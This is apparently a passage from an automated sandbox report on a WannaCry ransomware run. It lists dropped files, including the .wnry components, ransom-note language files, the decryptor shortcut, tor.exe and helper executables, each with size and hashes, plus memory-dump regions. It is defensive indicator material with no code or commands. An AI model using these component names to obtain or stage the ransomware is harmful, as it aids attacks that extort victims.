316587aaf8e24e0ede83396b292095eda863e2e4dbd8b556c1bc4a1c7906940f40958053eb5ac086766ac4f181c907850372a5b18d8c3fc519cbd3a53828782a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
dc32814d218e74a1f5f1fc9739fd4624

SHA1
869e37d53ddcc485df216c11473d31e01ef55509

SHA256
8bb4250fbf490448114e896742e1271a25e4e53a62fe80573819de82e1794963

SHA512
d6f7e9d8bfe1786357496e06fc44213242923c914af7ba5552d3a1b6458317b8bdceaff0273c45632054aeda7e63964d448cffcfac49e1aeed65af3f01c83dd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
452650092730b67ed41a84a32b1db643

SHA1
69645b70a46dbce87ebc04565efabf5960a97a2b

SHA256
d2f30a1b6b14f9b19de1a84e89a1b1eb281d5212a971f0777444245a37c2e1ad

SHA512
f9f26ef10b206fd102566d99989f0ff269c5f2862a39f9144266c937ab9c74bfe844ab6a1551f05c27279275038d9b47bb74d618f920a675785803fbf2ccfe7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
db454771878e53989f5126d383851f1a

SHA1
403d2c82db1e91d40cc9e6bc0484a86b466da5c2

SHA256
8ac7158dcb31d58b67256e934bc0aac389d85f17911970ddccd3d83f6906c42b

SHA512
95704a6d6dc572b0dab1e132971b69a79be88a629cd4fa0f33adddb6ca90c7a1f7124b75b5cd5769ca2fbf1bd100794ac46dfca5abd9da403c11a14c2cd86a04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7bfcc0bca30864dd7d26c85ffad60729

SHA1
7c31485b49b493b968921db28ae9d1fe3ca5bacc

SHA256
73dfac4b61ba576432a62811d24132b852132b07eb6beaf60d953a6601f9640e

SHA512
7dd183be87e63a16dc9b0153654f04b432b71bebb632d9ad40db113ad4519f0a04fb59e9a425eeeca074bbb1b36cc015b9f61c092962dafae9c8c2e41967da1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6129c379fa98feb15137da5653be5abe

SHA1
f7cb94c0270a07d73558c2ae9722f571faf9297e

SHA256
60c895c87e00dee9ed3adabddee6b899c5eef94888151d5bc5b133c5f920ce87

SHA512
6350ed456e093347982e1d7e0e8e1cb80fd1c177696e71bb47ddde926f82457ad2e8fbec68d6a779376be7e326ef7337fc51dffab6ce33ead642b12724e83d97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
69825d1a0f2b71e69486027e7e65f785

SHA1
a2d9468796e7f9384b39bf9ba0ee02a11b010559

SHA256
568e67482e43f9ef840a8a03a09da93505ac47a1ba4cc785b880535411ec50e4

SHA512
55336a34a0f778abc8feb0074d8f8111492f42f05693b079901729a66277268da91f593eb1208ceff8d47b6781e89b6f02ea1167aaa5002c9a8f8a468b77aced

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
57554ce7ab1428f2bdfaac65fbe6f9e3

SHA1
ec6b994a1dcee56b011cfd0910d353852200423c

SHA256
e47f1a92a1b038b1a121b3063870a9c64de2b8a9c5bf7e133ba9ff1c83ed4415

SHA512
de26456c74c6452b5e2944e67807f751898cc671505a4c623f26807b6db9f60f7b710cf85289201b9d9ad9f0acb930a35c4862390bc0b68d9f6708acf69ce859

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
746784502814b6bb12d04125a8753c11

SHA1
dff1b482e454a68c7dfb2ae4c1823334c9121fc6

SHA256
9ab837f630941b1156a03ce914f9ca8d5e0881038969c083d1f8fbefb891ffef

SHA512
2104b1fdac4539eaf418465f7e19c06d5be8b3f583e4cbe16d4b9f61b5640d44a29edc816a910f7d7f2552148412f9c13d505de64c0533bd30db91b54ff377c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
73fe93f700be4f8a4762ec1b8a3180d2

SHA1
326f20eec15fe64f670acb3c39b59809bfce9e67

SHA256
177d9c2deab26ad0a12a69e7a9fa52b88cc030dda26cdf461a4f5bb524768ace

SHA512
3b0489500cc661bb7b8210538ca8b52d796d3be89c60362809570101e78417f78b29a0dc33ecead85a3792c3ca525492f38ee80b45fe6a762cd4c5b51472a5fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
4b25a6f03cb1776b3dff4b13609064ed

SHA1
367ec5fcd10ce481920209e4c1f60bfee5985245

SHA256
48933513ae44f844a83594457eeb3b6ca89a0c2e5e851ccf18c5b2518a63fcf6

SHA512
4158ab27fed6fe56e81a847a44c3f1d976bfd321c0897fc5a382733069e12cf34f296e24724e6a2331796aaf191b613c552a3693930fe214ef156f4f5a2e1905

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588393.TMP

Filesize
538B

MD5
c0af553918957c3e8d77a408356cceb6

SHA1
fc42640fb7a15a0e3f9eb7265f4620988982b0cd

SHA256
96005c12cf94361fa66da45bbe88624d9ceb590f8b1f836acd67894836718535

SHA512
4fc4330d2b81c2e3830d04c48f54eaf04be43872b49a620b4c94908a16e992f812ae7f767d41cdada90f12599f6160da2bb22b6e1cc755ec19d2190affc7c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
aa7410e031c22c05f0d8fe55ce1a5be3

SHA1
c8e11dbb4563c4d0a65e6e96a7d4377502203d95

SHA256
1dfb0c8c6347cf1f96086ee221639b0ca3267e0d21e32ba9b1cc8340c1a10ab8

SHA512
5442234f3027ac1b7e48d25089660914957f9886abff1c98d900178106b6a9ee8efe5f39c11de60480ab190b7b84ed60b1ab483441feb593ec1b0d00a25f4f88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4f57be0c55dbcb60b79af0d9d32eb7fc

SHA1
c388988803b1ad387da1cc3eb0095a58861af831

SHA256
fa29df41d8592977a6ee625603d2b72a3fc71c10f388f05de1b77541d7e49f0b

SHA512
ad85fb732481abe8c987e1e0c67be6bf103d851bae0d42d73a7e6b2d2043e58f09ae8e82b47e7c553e88ac5bae39ba197c2693ed60bffa8fe1adfb20207a47e6

Download Submit
C:\Users\Admin\Downloads\53481729199101.bat

Filesize
322B

MD5
c719f3a51e489e5c9fbb334ecbb45ede

SHA1
5b5585065dd339e1e46f9243d3fe3cb511dc5ce6

SHA256
c67348cacc707decd859789c8ed1e8afdb6eb8753d3941d0ee9ecba2f00500b7

SHA512
b2b0ea3a3701b5d689a5cbcc5c16721cf807304ca02375f33c5b507c1a00655917354e32f6e2b96c081125751498484c974c2d3eaa754d6074c9d55aec8c0164

Download Submit
C:\Users\Admin\Downloads\@Please_Read_Me@.txt

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Downloads\@WanaDecryptor@.exe.lnk

Filesize
585B

MD5
c07b36dd06d305ad8c59002c544f4b1f

SHA1
3505173b5bf25cf2636df4d385504cf2d08e8e9f

SHA256
f9811025533721f37f6dd2fd7437548aa7af8d00b122e24c3e5dcf0f2acdac8c

SHA512
fbc81788deabd5542de5e99cb1977a735364393cc96de2b6a53e02b88781fe5fc05af8e8f525d27f0ff1ca4025107a7f68c8c831ca30bf2d1064fbda87e8e8be

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\c.wnry

Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\Downloads\m.vbs

Filesize
201B

MD5
b067df716aac6db38d973d4ad1337b29

SHA1
541edd1ca3047ca46fef38bd810e5f0f938b8ae2

SHA256
3f7ded679522e917f30aacbfb7c688ef477d7886e722731c812dc486195e220f

SHA512
0cbc1b820abf13e225e7a7636ce1e336d758fa54a9ee6aa09dee7a9748a2cf890f45ba55a7a188b69972b396bac37ddb9a98ba202ff2e203b34a75e515c0759c

Download Submit
C:\Users\Admin\Downloads\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Downloads\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Downloads\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Downloads\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Downloads\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Downloads\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Downloads\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Downloads\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\Downloads\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\Downloads\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\Downloads\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\Downloads\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\Downloads\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\Downloads\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\Downloads\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\Downloads\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\Downloads\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\Downloads\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
memory/1996-2276-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2257-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2254-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2251-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2253-0x0000000073800000-0x0000000073822000-memory.dmp

Filesize
136KB

Download
memory/1996-2260-0x0000000073800000-0x0000000073822000-memory.dmp

Filesize
136KB

Download
memory/1996-2258-0x00000000738C0000-0x00000000738DC000-memory.dmp

Filesize
112KB

Download
memory/1996-2262-0x00000000736F0000-0x0000000073772000-memory.dmp

Filesize
520KB

Download
memory/1996-2263-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2261-0x0000000073780000-0x00000000737F7000-memory.dmp

Filesize
476KB

Download
memory/1996-2259-0x0000000073830000-0x00000000738B2000-memory.dmp

Filesize
520KB

Download
memory/1996-2250-0x00000000736F0000-0x0000000073772000-memory.dmp

Filesize
520KB

Download
memory/1996-2269-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2393-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2282-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2387-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2384-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2252-0x0000000073830000-0x00000000738B2000-memory.dmp

Filesize
520KB

Download
memory/1996-2378-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/1996-2314-0x00000000734D0000-0x00000000736EC000-memory.dmp

Filesize
2.1MB

Download
memory/1996-2308-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3092-2287-0x00007FF8E7090000-0x00007FF8E70A0000-memory.dmp

Filesize
64KB

Download
memory/3092-2291-0x00007FF8E4C90000-0x00007FF8E4CA0000-memory.dmp

Filesize
64KB

Download
memory/3092-2290-0x00007FF8E4C90000-0x00007FF8E4CA0000-memory.dmp

Filesize
64KB

Download
